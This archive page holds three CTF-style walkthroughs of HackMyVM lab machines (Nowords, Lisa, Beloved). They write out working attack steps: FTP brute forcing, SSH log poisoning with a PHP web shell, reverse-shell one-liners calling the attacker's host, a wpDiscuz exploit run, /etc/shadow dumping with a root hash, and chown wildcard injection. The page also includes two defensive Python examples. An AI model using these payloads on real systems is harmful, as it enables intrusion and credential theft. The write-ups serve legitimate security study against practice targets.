Monthly archive: July 2021

HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below are the main steps.

Nmap the ports, then scan port 80; there is a hint in index.html.

 ~ curl http://192.168.56.100/index.html        
 Hint inside.

 <!-- [usernames and passwords are lowercase] -->

Download robots.txt: it is actually a PNG file with some strings in it.

[image-20210707134241221.png]

OCR the strings online, build a wordlist from them and run the port 80 scan again with it; only one valid file turns up. Download it: it is actually a JPG with another set of strings.

[image-20210707134856042.png]

OCR again, lowercase the first character of each word (recall the index.html hint) and build a second wordlist. Then brute-force FTP with that list as both username and password list.

 ~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: sophie   password: natalia
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through FTP we can browse the whole filesystem. In /home/sophie there are command.jpg and log.txt.

In /home/me there is doit.py.

 ~ cat doit.py
 #!/usr/bin/python3
 # coding: utf-8

 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance

 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha

 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()
     os.system(a[0])

The script OCRs /home/sophie/command.jpg with pytesseract, writes the text to /home/sophie/log.txt and hands the first line straight to os.system(). Nothing is validated, so whoever can write command.jpg (we can, over FTP as sophie) gets command execution as the user the cron job runs as.

We render a reverse-shell one-liner into command.jpg and upload it over FTP.

[image-20210707135227171.png]

Wait a minute and the reverse shell comes back.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49930.
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell
 sophie@nowords:~$

Root comes from the polkit local privilege escalation (CVE-2021-3560), which the linked PoC exploits.

Check the PoC here.

https://github.com/Almorabea/Polkit-exploit

[image-20210707134038343.png]

HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory scanning on port 80 finds nothing useful. Checking index.html shows a hint about the domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                  
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>

Add vinci.hmv to /etc/hosts and scan port 80 again; still nothing useful.

Use gobuster to enumerate vhosts (the grep drops the 10719-byte default response).

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================

Add secret.vinci.hmv to /etc/hosts and scan for files again; this time file.php shows up.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]

Fuzz the parameter name with wfuzz, hiding empty responses.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  

Looks like an LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...

See which files we can read with an LFI wordlist.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"

sshd writes the client-supplied username into auth.log for failed logins, so we can poison the log by using a PHP web shell as the SSH username; the LFI then includes the log and PHP executes it.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                

Now the included log executes our PHP and we can run commands through the c parameter.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
 =33(www-data)
  from 192.168.56.150 port 33632 ssh2
 ...
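The defender's side of this log poisoning, as an added example that is not part of the walkthrough: sshd writes the client-chosen username verbatim into auth.log for unknown users, so a detection only needs to parse the "invalid user" lines and ask whether the name looks like an account at all. The sample log lines are constructed for this example in the format shown above; the PHP username is the one sent with ssh earlier.

```python
"""Flag SSH log-poisoning attempts in auth.log.

Added example for the Lisa walkthrough, not code from the box or the author.
SAMPLE_AUTH_LOG is constructed, modelled on sshd's 'invalid user' lines.
"""
import re

# sshd logs the client-supplied name verbatim for unknown users, which is what
# makes /var/log/auth.log a log-poisoning target behind an LFI.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) "
    r"(?P<user>.*?) from (?P<ip>\S+)"
)
# POSIX portable username: lowercase letters, digits, _ and -, optional trailing $.
VALID_USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}\$?")
# Markers of a server-side payload smuggled through the username field.
PAYLOAD_MARKERS = ("<?", "?>", "$_GET", "$_POST", "$_REQUEST",
                   "system(", "passthru(", "shell_exec(", "eval(")


def classify_username(user):
    """Return a reason string if the username looks like a payload, else None."""
    lowered = user.lower()
    for marker in PAYLOAD_MARKERS:
        if marker.lower() in lowered:
            return f"code marker {marker!r}"
    if not VALID_USERNAME_RE.fullmatch(user):
        return "not a valid POSIX username"
    return None


def scan_auth_log(lines):
    """Return (ip, user, reason) for every invalid-user line with a suspicious name."""
    hits = []
    for line in lines:
        m = INVALID_USER_RE.search(line)
        if not m:
            continue
        reason = classify_username(m.group("user"))
        if reason:
            hits.append((m.group("ip"), m.group("user"), reason))
    return hits


SAMPLE_AUTH_LOG = [  # constructed lines in sshd's auth.log format
    "Jun 20 21:50:01 Lisa sshd[7901]: Invalid user admin from 192.168.56.150 port 33610",
    "Jun 20 21:50:03 Lisa sshd[7901]: Failed password for invalid user admin from 192.168.56.150 port 33610 ssh2",
    "Jun 20 21:55:25 Lisa sshd[7932]: Invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33632",
    "Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33632 ssh2",
    "Jun 20 22:01:10 Lisa sshd[7950]: Invalid user Admin Bob from 10.0.0.9 port 40001",
    "Jun 20 22:03:00 Lisa sshd[7960]: Accepted publickey for leonardo from 192.168.56.150 port 40100 ssh2",
]

if __name__ == "__main__":
    for ip, user, reason in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{ip}\t{reason}\t{user!r}")
```

Valid usernames are checked against the POSIX portable character set, which catches more than PHP tags: a name with spaces, upper case or shell metacharacters in an "invalid user" line is a poisoning attempt or at least worth a look.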

Get a reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  

There is only one user, leonardo, and /opt/cron.sh belongs to him.

 www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
 find / -user leonardo 2>/dev/null
 /home/leonardo
 /home/leonardo/.bash_logout
 /home/leonardo/.profile
 /home/leonardo/.bashrc
 /home/leonardo/.local
 /home/leonardo/.local/share
 /home/leonardo/.selected_editor
 /home/leonardo/user.txt
 /opt/cron.sh


Check the source code of cron.sh.

 www-data@Lisa:/opt$ cat cron.sh
 cat cron.sh
 #!/bin/bash

 domain='shelly.lisa.hmv'

 function check(){

     timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
     if [ "$(echo $?)" == "0" ]; then
         nohup nc -e /bin/sh $domain 65000
         exit 0
     else
         exit 1
     fi

 }


The script pings shelly.lisa.hmv and, if the host answers, connects back to it on port 65000 with nc -e /bin/sh as the user the cron job runs as. The name is resolved through /etc/hosts, which is world-writable (-rw----rw-), so www-data can point it at the attacker's machine. Appending with >> would be less destructive than overwriting the whole file.

 www-data@Lisa:/opt$ ls -la /etc/hosts
 ls -la /etc/hosts
 -rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
 www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts


Wait a minute and we get a reverse shell as leonardo.

 ~ nc -nlvp 65000
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Put our id_rsa.pub into /home/leonardo/.ssh/authorized_keys, chmod 600 it, and we get SSH access.

 ~ ssh leonardo@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$

Check sudo -l.

 leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax

Use efax to read the shadow file: -d takes the path of the fax device, efax opens it and echoes whatever it reads back as an "unexpected response", so sudo efax -d /etc/shadow dumps the file line by line.

 leonardo@Lisa:~$ sudo efax -d /etc/shadow
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: 10:17 compiled Dec 15 2016 12:12:26
 efax: 10:17 opened /etc/shadow
 efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
 efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "bin:
 :18791:0:99999:7:::"
 ...


Use john to crack root's password hash.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 iloveme (root)
 1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed


Get root at last.

 leonardo@Lisa:~$ su root
 Contraseña:
 root@Lisa:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 Lisa

HackMyVm Beloved Walkthrough(chown wildcard injection)

https://hackmyvm.eu/machines/machine.php?vm=Beloved

Scan for open ports.

 ~ nmap -sV -sC -p- -oN ports.log 192.168.56.100
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-generator: WordPress 5.7.2
 | http-robots.txt: 1 disallowed entry
 |_/wp-admin/
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Beloved – Just another WordPress site
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is WordPress. Add beloved to /etc/hosts and enumerate plugins with wpscan.

 ~ wpscan --url http://beloved -e ap --no-banner --api-token yourkey --force --plugins-detection aggressive |tee wpscan.log
 [+] wpdiscuz
  | Location: http://beloved/wp-content/plugins/wpdiscuz/
  | Last Updated: 2021-05-15T13:40:00.000Z
  | Readme: http://beloved/wp-content/plugins/wpdiscuz/readme.txt
  | [!] The version is out of date, the latest version is 7.2.2
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://beloved/wp-content/plugins/wpdiscuz/, status: 200
  |
  | [!] 1 vulnerability identified:
  |
  | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
  |     Fixed in: 7.0.5
  |     References:
  |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
  |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
  |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
  |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
  |
  | Version: 7.0.4 (80% confidence)

Search exploit-db for wpdiscuz.

 ~ searchsploit wpdiscuz
 ------------------------------------------------------------------------ ---------------------------------
  Exploit Title                                                          |  Path
 ------------------------------------------------------------------------ ---------------------------------
 WordPress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticate | php/webapps/49962.sh
 WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticate | php/webapps/49967.py
 WordPress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload | php/webapps/49401.rb
 ------------------------------------------------------------------------ --------------------------------

Run the PoC code.

 ~ python3 49967.py -u http://beloved -p /2021/06/09/hello-world/

 [-] WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution
 [-] File Upload Bypass Vulnerability - PHP Webshell Upload
 [-] CVE: CVE-2020-24186
 [-] https://github.com/hevox

 [+] Response length:[51680] | code:[200]
 [!] Got wmuSecurity value: 9c794f21e7
 [!] Got wmuSecurity value: 1

 [+] Generating random name for Webshell...
 [!] Generated webshell name: bhgnpbentfvkgzh

 [!] Trying to Upload Webshell..
 [+] Upload Success... Webshell path:url":"http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php";


Start a listener on port 1234 and call the webshell with a Python reverse-shell one-liner in the cmd parameter.

http://beloved/wp-content/uploads/2021/07/bhgnpbentfvkgzh-1625199034.4666.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Check sudo -l.

 www-data@beloved:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on beloved:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on beloved:
     (beloved) NOPASSWD: /usr/local/bin/nokogiri

nokogiri's command-line tool parses the file it is given and then drops into an interactive Ruby session with the document in @doc. Any readable file will do as the argument (an empty /tmp/log.txt here), and from the Ruby prompt system runs commands as beloved.

 www-data@beloved:/$ touch /tmp/log.txt
 touch /tmp/log.txt
 www-data@beloved:/$ sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 sudo -u beloved /usr/local/bin/nokogiri /tmp/log.txt
 Your document is stored in @doc...
 Switch to inspect mode.
 system 'id'
 system 'id'
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)
 system '/bin/bash'

Now we are beloved. Fetch our id_rsa.pub into ~/.ssh/authorized_keys to get SSH access.

 cd .ssh
 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 --2021-07-02 06:44:36-- http://192.168.56.150/id_rsa.pub
 Connecting to 192.168.56.150:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 565 [application/x-mspublisher]
 Saving to: ‘authorized_keys’
 ...
 chmod 600 authorized_keys


SSH in as beloved.

 ~ ssh beloved@192.168.56.100
 ...
 beloved@beloved:~$ id
 uid=1000(beloved) gid=1000(beloved) groups=1000(beloved)


Run pspy64 to watch the cron jobs.

 2021/07/02 06:47:01 CMD: UID=0 PID=1878 | /usr/sbin/CRON -f
 2021/07/02 06:47:01 CMD: UID=0 PID=1879 | /bin/sh -c cd /opt && chown root:root *


In /opt there is only id_rsa, presumably root's private key, owned by root with mode 600. The directory itself is group-writable by beloved, so we can create files there, and the cron job's chown root:root * will operate on whatever names we plant.

 beloved@beloved:/$ ls -la opt
 total 12
 drwxrwx---  2 root    beloved 4096 Jul  2 06:52 .
 drwxr-xr-x 18 root    root    4096 May 19 10:09 ..
 -rw-------  1 root    root    1823 Jun 27 16:41 id_rsa

Use chown wildcard injection: the shell expands * to every filename in /opt, including one literally named --reference=ref, and GNU chown takes that argument as the option --reference=ref, which copies ownership from ref and overrides the root:root argument. See the article here.

 beloved@beloved:/opt$ touch ref
 beloved@beloved:/opt$ touch -- --reference=ref

After the next cron run, id_rsa is owned by beloved, the owner of ref.

 beloved@beloved:/opt$ ls -la
 total 12
 drwxrwx--- 2 root beloved 4096 Jul 2 06:59 .
 drwxr-xr-x 18 root root 4096 May 19 10:09 ..
 -rw------- 1 beloved beloved 1823 Jun 27 16:41 id_rsa
 -rw-r--r-- 1 beloved beloved 0 Jul 2 06:58 ref
 -rw-r--r-- 1 beloved beloved 0 Jul 2 06:59 '--reference=ref'
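The wildcard injection reproduced locally, as an added example and not the box's cron job: because changing ownership requires root, it uses chmod --reference in place of chown --reference. Both are GNU coreutils tools with the same option parsing, and a mode change is observable as an unprivileged user. It assumes GNU coreutils and a POSIX /bin/sh; the id_rsa, ref and --reference=ref files are constructed in a temporary directory, and the "cron job" is the command string handed to simulate().

```python
"""Reproduce the /opt wildcard injection with chmod instead of chown.

Added example for the Beloved walkthrough, not the box's cron job. chmod
--reference stands in for chown --reference so it runs without root.
Assumes GNU coreutils (BSD chmod has no --reference) and /bin/sh.
"""
import os
import shlex
import stat
import subprocess
import tempfile


def mode_of(path):
    """Permission bits of path, e.g. 0o600."""
    return stat.S_IMODE(os.stat(path).st_mode)


def run_cron_style(directory, command):
    """Run command the way the Beloved cron job ran chown: cd into the
    directory and let /bin/sh expand the unquoted * glob."""
    return subprocess.run(
        ["sh", "-c", f"cd {shlex.quote(directory)} && {command}"],
        capture_output=True, text=True,
    )


def simulate(command, inject=True):
    """Stage an /opt-like directory, run the cron command, return id_rsa's final mode.

    Staging (all constructed for the example):
      id_rsa            mode 0600, what the cron job means to enforce
      ref               mode 0644, the attacker's reference file
      --reference=ref   empty file whose *name* the glob turns into an option
    """
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "id_rsa")
        with open(secret, "w") as f:
            f.write("FAKE KEY, constructed for the example\n")
        os.chmod(secret, 0o600)
        ref = os.path.join(d, "ref")
        open(ref, "w").close()
        os.chmod(ref, 0o644)
        if inject:
            # The glob matches a leading '-', and GNU getopt permutes arguments,
            # so `chmod 600 --reference=ref id_rsa ref` applies ref's mode, not 600.
            open(os.path.join(d, "--reference=ref"), "w").close()
        run_cron_style(d, command)
        return mode_of(secret)


if __name__ == "__main__":
    for cmd in ("chmod 600 *", "chmod 600 -- *", "chmod 600 ./*"):
        print(f"{cmd:<16} -> id_rsa mode {simulate(cmd):o}")
```

simulate("chmod 600 *") returns 0o644, the attacker's choice, while "chmod 600 -- *" and "chmod 600 ./*" keep 0o600. The fix for the Beloved cron job is the same: cd /opt && chown root:root -- * (or ./*), and better still, not letting an unprivileged group write to the directory at all.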


Copy id_rsa out and log in over SSH as root.

 ~ ssh root@192.168.56.100 -i key ...
 root@beloved:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 beloved